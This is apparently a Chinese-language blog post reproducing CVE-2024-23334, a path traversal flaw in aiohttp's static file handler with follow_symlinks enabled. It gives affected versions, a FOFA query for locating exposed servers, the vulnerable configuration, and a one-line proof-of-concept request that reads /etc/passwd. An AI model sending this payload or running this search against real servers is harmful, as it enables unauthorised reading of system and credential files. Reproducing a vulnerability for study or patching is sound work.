【CVE-2024-23334 aiohttp static follow_symlinks未授权任意文件读取漏洞】【漏洞复现】【漏洞poc】
aiohttp是一个Python的HTTP客户端/服务器框架,它基于asyncio库实现异步编程模型,可以支持高性能和高并发的HTTP通信。aiohttp用于编写异步的Web服务器、Web应用程序或HTTP客户端,以提供对Web和HTTP资源的访问和操作。
·
【CVE-2024-23334 aiohttp static follow_symlinks未授权任意文件读取漏洞】【漏洞复现】【漏洞poc】
介绍
aiohttp是一个Python的HTTP客户端/服务器框架,它基于asyncio库实现异步编程模型,可以支持高性能和高并发的HTTP通信。aiohttp用于编写异步的Web服务器、Web应用程序或HTTP客户端,以提供对Web和HTTP资源的访问和操作。
存在漏洞版本
>= 1.0.5, < 3.9.2
fofa全球资产 百万级
易受攻击
利用难度:容易
fofa: app="aiohttp"
导致漏洞的原因
aiohttp使用选项"follow_symlinks"来决定是否跟踪静态根目录之外的符号链接。当"follow_symlinks "设置为 "True "时,将不会验证读取的文件是否在根目录内从而导致目录遍历,攻击者可以利用此漏洞访问系统上的任意文件。
app.router.add_routes([
web.static("/static", "static/", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability
])
**
poc
**
#GET
https://目标IP/static/../../../../../../etc/passwd
更多推荐
已为社区贡献1条内容
所有评论(0)